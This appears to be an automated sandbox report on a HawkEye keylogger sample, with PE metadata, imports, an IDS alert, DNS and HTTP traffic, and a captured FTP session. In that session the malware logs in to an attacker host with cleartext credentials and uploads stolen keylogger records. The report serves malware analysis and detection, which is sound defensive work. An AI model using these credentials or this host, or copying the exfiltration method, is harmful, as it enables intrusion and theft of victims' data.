.data | 0x9000 | 0x25c58 | 0x400 | False | 0.58203125 | data | 4.76995537906 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x2f000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x37000 | 0x900 | 0xa00 | False | 0.4078125 | data | 3.93441125971 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0x37190 | 0x2e8 | data | English | United States
RT_DIALOG | 0x37478 | 0x100 | data | English | United States
RT_DIALOG | 0x37578 | 0x11c | data | English | United States
RT_DIALOG | 0x37698 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x376f8 | 0x14 | data | English | United States
RT_MANIFEST | 0x37710 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States
DLL | Import
KERNEL32.dll | CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA
USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
03/11/22-11:57:06.388212 | TCP | 2020410 | ET TROJAN HawkEye Keylogger FTP | 49782 | 21 | 192.168.2.4 | 66.70.204.222
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                      Mar 11, 2022 11:57:06.388211966 CET4978221192.168.2.466.70.204.222
                                                                                                                                                      Mar 11, 2022 11:57:06.499972105 CET214978266.70.204.222192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:57:06.500601053 CET4978359592192.168.2.466.70.204.222
                                                                                                                                                      Mar 11, 2022 11:57:06.502582073 CET4978359592192.168.2.466.70.204.222
                                                                                                                                                      Mar 11, 2022 11:57:06.503002882 CET4978359592192.168.2.466.70.204.222
                                                                                                                                                      Mar 11, 2022 11:57:06.607103109 CET595924978366.70.204.222192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:57:06.608611107 CET214978266.70.204.222192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:57:06.608766079 CET4978221192.168.2.466.70.204.222
                                                                                                                                                      Mar 11, 2022 11:57:06.608994961 CET595924978366.70.204.222192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:57:06.609338045 CET595924978366.70.204.222192.168.2.4
                                                                                                                                                      Mar 11, 2022 11:57:06.609569073 CET4978359592192.168.2.466.70.204.222
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Mar 11, 2022 11:56:39.170579910 CET  60758        53         192.168.2.4  8.8.8.8
Mar 11, 2022 11:56:39.190047979 CET  53           60758      8.8.8.8      192.168.2.4
Mar 11, 2022 11:56:39.458843946 CET  60647        53         192.168.2.4  8.8.8.8
Mar 11, 2022 11:56:39.479759932 CET  53           60647      8.8.8.8      192.168.2.4
Mar 11, 2022 11:56:39.571732998 CET  64909        53         192.168.2.4  8.8.8.8
Mar 11, 2022 11:56:39.593318939 CET  53           64909      8.8.8.8      192.168.2.4
Mar 11, 2022 11:57:05.145423889 CET  54069        53         192.168.2.4  8.8.8.8
Mar 11, 2022 11:57:05.172800064 CET  53           54069      8.8.8.8      192.168.2.4
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                       Type                  Class
Mar 11, 2022 11:56:39.170579910 CET  192.168.2.4  8.8.8.8  0x9e4d    Standard query (0)  63.155.11.0.in-addr.arpa   PTR (Pointer record)  IN (0x0001)
Mar 11, 2022 11:56:39.458843946 CET  192.168.2.4  8.8.8.8  0xfce7    Standard query (0)  whatismyipaddress.com      A (IP address)        IN (0x0001)
Mar 11, 2022 11:56:39.571732998 CET  192.168.2.4  8.8.8.8  0x1ec8    Standard query (0)  whatismyipaddress.com      A (IP address)        IN (0x0001)
Mar 11, 2022 11:57:05.145423889 CET  192.168.2.4  8.8.8.8  0xd252    Standard query (0)  ftp.manchutimefashion.com  A (IP address)        IN (0x0001)
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code      Name                       CName  Address        Type                  Class
Mar 11, 2022 11:56:39.190047979 CET  8.8.8.8    192.168.2.4  0x9e4d    Name error (3)  63.155.11.0.in-addr.arpa   none   none           PTR (Pointer record)  IN (0x0001)
Mar 11, 2022 11:56:39.479759932 CET  8.8.8.8    192.168.2.4  0xfce7    No error (0)    whatismyipaddress.com      none   104.16.155.36  A (IP address)        IN (0x0001)
Mar 11, 2022 11:56:39.479759932 CET  8.8.8.8    192.168.2.4  0xfce7    No error (0)    whatismyipaddress.com      none   104.16.154.36  A (IP address)        IN (0x0001)
Mar 11, 2022 11:56:39.593318939 CET  8.8.8.8    192.168.2.4  0x1ec8    No error (0)    whatismyipaddress.com      none   104.16.154.36  A (IP address)        IN (0x0001)
Mar 11, 2022 11:56:39.593318939 CET  8.8.8.8    192.168.2.4  0x1ec8    No error (0)    whatismyipaddress.com      none   104.16.155.36  A (IP address)        IN (0x0001)
Mar 11, 2022 11:57:05.172800064 CET  8.8.8.8    192.168.2.4  0xd252    No error (0)    ftp.manchutimefashion.com  none   66.70.204.222  A (IP address)        IN (0x0001)
• whatismyipaddress.com
Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
0           192.168.2.4  49772        104.16.154.36   443               C:\Users\user\AppData\Local\Temp\pjavpo.exe
Timestamp  kBytes transferred  Direction  Data
(no plaintext packets for this TLS session; the decrypted exchange is listed under the proxied session 0 further down)


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
1           192.168.2.4  49771        104.16.155.36   80                C:\Users\user\AppData\Local\Temp\pjavpo.exe
Timestamp                            kBytes transferred  Direction  Data
Mar 11, 2022 11:56:39.517868042 CET  1151                OUT        GET / HTTP/1.1
    Host: whatismyipaddress.com
    Connection: Keep-Alive
Mar 11, 2022 11:56:39.541863918 CET  1152                IN         HTTP/1.1 301 Moved Permanently
    Date: Fri, 11 Mar 2022 10:56:39 GMT
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Fri, 11 Mar 2022 11:56:39 GMT
    Location: https://whatismyipaddress.com/
    Set-Cookie: __cf_bm=rE07xrxDQ3gu5160rFCOZBo1xcY2ARBHMkXyiq.YvX4-1646996199-0-AX39iZhctemb+yAyetr/r3JPZ9wotRMzUuDaAqFqyu9phi5ADWZTJw7ik1WKJR3/bbU0y/Dzu/Oc4rpFB6LmM6E=; path=/; expires=Fri, 11-Mar-22 11:26:39 GMT; domain=.whatismyipaddress.com; HttpOnly
    Server: cloudflare
    CF-RAY: 6ea3c3c70b5a5c4a-FRA
    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                      0192.168.2.449772104.16.154.36443C:\Users\user\AppData\Local\Temp\pjavpo.exe
                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                      2022-03-11 10:56:40 UTC0OUTGET / HTTP/1.1
                                                                                                                                                      Host: whatismyipaddress.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      2022-03-11 10:56:40 UTC0INHTTP/1.1 403 Forbidden
                                                                                                                                                      Date: Fri, 11 Mar 2022 10:56:40 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                      Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                      Set-Cookie: __cf_bm=0fu62l9a9_o52ZpSiY3B2Ubbqf8OPYGmRmWYhvH38y0-1646996200-0-AfArknz4ODut5S1R3Wyrv/QQodqXd6I1PPLa+MPUvKGZ6LT0rq7co6gxFQbkOapzHcyoZ6cbSHNSxTJdVa3eLOE=; path=/; expires=Fri, 11-Mar-22 11:26:40 GMT; domain=.whatismyipaddress.com; HttpOnly; Secure
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 6ea3c3cbc8a66955-FRA
                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                      2022-03-11 10:56:40 UTC1INData Raw: 33 33 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                                                      Data Ascii: 339a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                                                                      2022-03-11 10:56:40 UTC1INData Raw: 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 74 69 74 6c 65 3e 50 6c 65 61 73 65 20 57 61 69 74 2e 2e 2e 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 61 70 74 63 68 61 2d 62 79 70 61 73 73 22 20 69 64 3d 22 63 61 70 74 63 68 61 2d 62 79 70 61 73 73 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63
                                                                                                                                                      Data Ascii: > ...<![endif]--><head><title>Please Wait... | Cloudflare</title> <meta name="captcha-bypass" id="captcha-bypass" /><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" c
                                                                                                                                                      2022-03-11 10:56:40 UTC2INData Raw: 46 50 57 76 3a 20 22 67 22 2c 0a 20 20 20 20 20 20 20 20 63 54 54 69 6d 65 4d 73 3a 20 22 31 30 30 30 22 2c 0a 20 20 20 20 20 20 20 20 63 4c 74 3a 20 22 6e 22 2c 0a 20 20 20 20 20 20 20 20 63 52 71 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 72 75 3a 20 22 61 48 52 30 63 48 4d 36 4c 79 39 33 61 47 46 30 61 58 4e 74 65 57 6c 77 59 57 52 6b 63 6d 56 7a 63 79 35 6a 62 32 30 76 22 2c 0a 20 20 20 20 20 20 20 20 20 20 72 61 3a 20 22 22 2c 0a 20 20 20 20 20 20 20 20 20 20 72 6d 3a 20 22 52 30 56 55 22 2c 0a 20 20 20 20 20 20 20 20 20 20 64 3a 20 22 56 62 30 77 4d 34 53 70 57 75 62 6c 54 4b 74 61 4c 51 45 7a 69 62 62 55 61 78 48 38 55 6a 6d 73 63 46 7a 6b 6e 72 77 56 69 4e 4c 44 45 67 42 6b 2b 31 34 32 44 4f 4e 77 36 38 73 75 6b 36 62 41 32 5a 71 6f 72 66 67 51 46
                                                                                                                                                      Data Ascii: FPWv: "g", cTTimeMs: "1000", cLt: "n", cRq: { ru: "aHR0cHM6Ly93aGF0aXNteWlwYWRkcmVzcy5jb20v", ra: "", rm: "R0VU", d: "Vb0wM4SpWublTKtaLQEzibbUaxH8UjmscFzknrwViNLDEgBk+142DONw68suk6bA2ZqorfgQF
                                                                                                                                                      2022-03-11 10:56:40 UTC4INData Raw: 74 6f 3b 7d 0a 20 20 23 63 66 2d 77 72 61 70 70 65 72 20 23 63 66 2d 70 6c 65 61 73 65 2d 77 61 69 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 0a 20 20 2e 61 74 74 72 69 62 75 74 69 6f 6e 20 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 32 70 78 3b 7d 0a 20 20 2e 62 75 62 62 6c 65 73 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 38 32 32 30 3b 20 77 69 64 74 68 3a 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 32 30 70 78 3b 20 6d 61 72 67 69 6e 3a 32 70 78 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 30 30 25 3b 20 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 20 7d 0a 20 20 23 63 66 2d 77 72 61 70 70 65 72 20 23 63 68 61 6c 6c 65 6e 67 65 2d 66 6f 72 6d 20 7b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a
                                                                                                                                                      Data Ascii: to;} #cf-wrapper #cf-please-wait{text-align:center} .attribution {margin-top: 32px;} .bubbles { background-color: #f58220; width:20px; height: 20px; margin:2px; border-radius:100%; display:inline-block; } #cf-wrapper #challenge-form { padding-top:
                                                                                                                                                      2022-03-11 10:56:40 UTC5INData Raw: 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 20 63 66 2d 63 61 70 74 63 68 61 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 73 20 74 77 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 68 69 67 68 6c 69 67 68 74 2d 69 6e 76 65 72 73 65 20 63 66 2d 66 6f 72 6d 2d 73 74 61 63 6b 65 64 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: class="cf-section cf-highlight cf-captcha-container"> <div class="cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <div class="cf-highlight-inverse cf-form-stacked">
                                                                                                                                                      2022-03-11 10:56:40 UTC6INData Raw: 36 47 57 31 36 4d 76 57 44 67 51 4c 56 74 59 54 66 72 65 4b 34 70 38 65 79 79 77 45 61 4f 4c 73 39 75 51 35 30 48 68 47 46 36 52 71 4f 6c 4e 43 71 48 41 48 44 4c 5f 58 39 53 4f 6c 5f 65 30 64 68 64 68 58 39 63 6c 32 73 32 30 52 71 79 42 39 68 71 6c 36 72 6b 38 36 72 59 39 68 61 30 31 6e 47 44 77 31 39 79 79 33 77 55 36 55 77 61 68 48 2d 48 54 42 54 4d 4b 62 65 33 31 56 77 71 4f 46 69 41 77 6f 54 54 45 6d 5a 44 79 50 46 54 6c 4d 62 36 64 64 52 4f 6f 6e 62 43 64 72 58 67 32 48 36 65 46 6a 6e 67 66 71 34 38 38 68 4f 5f 48 67 4d 77 69 56 2d 32 41 6d 51 34 7a 69 35 42 55 67 44 6c 69 64 6d 6d 37 59 47 56 79 46 58 6c 4f 6f 68 75 66 34 4e 35 45 6e 7a 72 38 57 36 71 58 6d 46 65 71 73 49 6c 68 61 59 38 39 73 50 4e 39 35 55 74 59 74 57 6c 5f 5a 33 56 32 32 37 62 79
                                                                                                                                                      Data Ascii: 6GW16MvWDgQLVtYTfreK4p8eyywEaOLs9uQ50HhGF6RqOlNCqHAHDL_X9SOl_e0dhdhX9cl2s20RqyB9hql6rk86rY9ha01nGDw19yy3wU6UwahH-HTBTMKbe31VwqOFiAwoTTEmZDyPFTlMb6ddROonbCdrXg2H6eFjngfq488hO_HgMwiV-2AmQ4zi5BUgDlidmm7YGVyFXlOohuf4N5Enzr8W6qXmFeqsIlhaY89sPN95UtYtWl_Z3V227by
                                                                                                                                                      2022-03-11 10:56:40 UTC8INData Raw: 4d 72 56 43 45 6a 77 67 74 47 37 33 4f 71 31 45 59 55 6b 70 69 74 61 52 35 37 74 41 65 2b 52 39 69 2b 4a 36 6a 47 74 5a 78 63 34 48 72 66 5a 6f 77 78 38 69 49 59 4e 4b 59 57 66 78 65 2f 68 63 70 32 34 41 35 4e 42 41 53 4f 67 4f 5a 49 61 4f 2f 76 4f 2f 42 70 64 5a 62 4c 51 36 78 78 45 68 49 62 34 45 6c 6a 73 53 76 78 50 79 2b 6f 41 57 68 6a 43 4b 74 6c 4c 31 70 78 30 49 67 6f 49 53 2f 47 7a 43 78 4d 61 67 45 50 76 6d 78 56 6f 45 56 68 45 63 4a 77 6f 50 76 68 63 4f 55 30 4e 43 53 76 68 36 68 62 2b 47 47 48 35 47 71 6b 37 54 56 4a 35 63 6f 57 77 65 7a 55 4b 73 74 57 6a 79 33 59 59 52 48 79 57 70 74 6c 7a 4f 46 36 37 38 67 57 70 78 63 36 47 50 34 65 38 51 68 65 61 47 6b 54 30 77 35 69 4e 31 58 6e 5a 55 32 66 47 75 41 62 47 46 51 31 42 63 31 59 48 6a 44 46 31
                                                                                                                                                      Data Ascii: MrVCEjwgtG73Oq1EYUkpitaR57tAe+R9i+J6jGtZxc4HrfZowx8iIYNKYWfxe/hcp24A5NBASOgOZIaO/vO/BpdZbLQ6xxEhIb4EljsSvxPy+oAWhjCKtlL1px0IgoIS/GzCxMagEPvmxVoEVhEcJwoPvhcOU0NCSvh6hb+GGH5Gqk7TVJ5coWwezUKstWjy3YYRHyWptlzOF678gWpxc6GP4e8QheaGkT0w5iN1XnZU2fGuAbGFQ1Bc1YHjDF1
                                                                                                                                                      2022-03-11 10:56:40 UTC9INData Raw: 69 70 74 20 6f 6e 20 61 6e 64 20 72 65 6c 6f 61 64 20 74 68 65 20 70 61 67 65 2e 3c 2f 68 31 3e 0a 20 20 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 6e 6f 2d 63 6f 6f 6b 69 65 2d 77 61 72 6e 69 6e 67 22 20 63 6c 61 73 73 3d 22 63 6f 6f 6b 69 65 2d 77 61 72 6e 69 6e 67 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 74 75 72 6e 5f 6f 6e 5f 63 6f 6f 6b 69 65 73 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 0a 20 20 20 20 20 20 3c 70 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 74 75 72 6e 5f 6f 6e 5f 63 6f 6f 6b 69 65 73 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 62 64 32 34 32 36 3b 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 43 6f 6f 6b 69 65 73 20 61 6e 64 20 72 65 6c 6f 61 64 20
                                                                                                                                                      Data Ascii: ipt on and reload the page.</h1> </noscript> <div id="no-cookie-warning" class="cookie-warning" data-translate="turn_on_cookies" style="display:none"> <p data-translate="turn_on_cookies" style="color:#bd2426;">Please enable Cookies and reload
                                                                                                                                                      2022-03-11 10:56:40 UTC10INData Raw: 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 72 6b 6a 73 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 63 70 6f 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0a 20 20 20 20 20 20 20 20 63 70 6f 2e 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3b 0a 20 20 20 20 20 20 20 20 63 70 6f 2e 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 68 2f 67 2f 6f 72 63 68 65 73 74 72 61 74 65 2f 6d 61 6e 61 67 65 64 2f 76 31 3f 72 61 79 3d 36 65 61 33 63 33 63 62 63 38 61 36 36 39 35 35 22 3b 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 51 75 65 72 79 20 3d 20 6c 6f 63 61
                                                                                                                                                      Data Ascii: y.appendChild(trkjs); var cpo=document.createElement('script'); cpo.type='text/javascript'; cpo.src="/cdn-cgi/challenge-platform/h/g/orchestrate/managed/v1?ray=6ea3c3cbc8a66955"; window._cf_chl_opt.cOgUQuery = loca
                                                                                                                                                      2022-03-11 10:56:40 UTC12INData Raw: 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 73 20 74 77 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 77 68 79 5f 63 61 70 74 63 68 61 5f 68 65 61 64 6c 69 6e 65 22 3e 57 68 79 20 64 6f 20 49 20 68 61 76 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 20 61 20 43 41 50 54 43 48 41 3f 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 77 68 79 5f 63 61 70 74 63 68 61 5f 64 65 74 61 69 6c 22 3e 43 6f 6d 70 6c 65 74 69 6e 67 20 74 68 65 20 43
                                                                                                                                                      Data Ascii: apper"> <div class="cf-columns two"> <div class="cf-column"> <h2 data-translate="why_captcha_headline">Why do I have to complete a CAPTCHA?</h2> <p data-translate="why_captcha_detail">Completing the C
2022-03-11 10:56:40 UTC 13 IN Data Ascii: s="cf-footer-separator sm:hidden">&bull;</span> <span class="cf-footer-item sm:block sm:mb-1"><span>Your IP</span>: 84.17.52.20</span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span class="cf-footer-item sm:block sm:mb-1"><spa
2022-03-11 10:56:40 UTC 14 IN Data Ascii: 0


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Mar 11, 2022 11:57:05.401681900 CET | 21 | 49782 | 66.70.204.222 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
 | | | | | 220-You are user number 6 of 50 allowed.
 | | | | | 220-Local time is now 14:57. Server port: 21.
 | | | | | 220-This is a private system - No anonymous login
 | | | | | 220-IPv6 connections are also welcome on this server.
 | | | | | 220 You will be disconnected after 15 minutes of inactivity.
Mar 11, 2022 11:57:05.416121006 CET | 49782 | 21 | 192.168.2.4 | 66.70.204.222 | USER Elooggs2020@manchutimefashion.com
Mar 11, 2022 11:57:05.527828932 CET | 21 | 49782 | 66.70.204.222 | 192.168.2.4 | 331 User Elooggs2020@manchutimefashion.com OK. Password required
Mar 11, 2022 11:57:05.528053999 CET | 49782 | 21 | 192.168.2.4 | 66.70.204.222 | PASS [r2W$.jaD*?p
Mar 11, 2022 11:57:05.654520988 CET | 21 | 49782 | 66.70.204.222 | 192.168.2.4 | 230 OK. Current restricted directory is /
Mar 11, 2022 11:57:05.766429901 CET | 21 | 49782 | 66.70.204.222 | 192.168.2.4 | 504 Unknown command
Mar 11, 2022 11:57:05.767116070 CET | 49782 | 21 | 192.168.2.4 | 66.70.204.222 | PWD
Mar 11, 2022 11:57:05.878653049 CET | 21 | 49782 | 66.70.204.222 | 192.168.2.4 | 257 "/" is your current location
Mar 11, 2022 11:57:05.878947020 CET | 49782 | 21 | 192.168.2.4 | 66.70.204.222 | CWD /
Mar 11, 2022 11:57:05.990483999 CET | 21 | 49782 | 66.70.204.222 | 192.168.2.4 | 250 OK. Current directory is /
Mar 11, 2022 11:57:05.990739107 CET | 49782 | 21 | 192.168.2.4 | 66.70.204.222 | TYPE I
Mar 11, 2022 11:57:06.102324009 CET | 21 | 49782 | 66.70.204.222 | 192.168.2.4 | 200 TYPE is now 8-bit binary
Mar 11, 2022 11:57:06.102615118 CET | 49782 | 21 | 192.168.2.4 | 66.70.204.222 | PASV
Mar 11, 2022 11:57:06.214400053 CET | 21 | 49782 | 66.70.204.222 | 192.168.2.4 | 227 Entering Passive Mode (66,70,204,222,232,200)
Mar 11, 2022 11:57:06.388211966 CET | 49782 | 21 | 192.168.2.4 | 66.70.204.222 | STOR HawkEye_Keylogger_Stealer_Records_760639 3.11.2022 12:04:44 PM.txt
Mar 11, 2022 11:57:06.499972105 CET | 21 | 49782 | 66.70.204.222 | 192.168.2.4 | 150 Accepted data connection
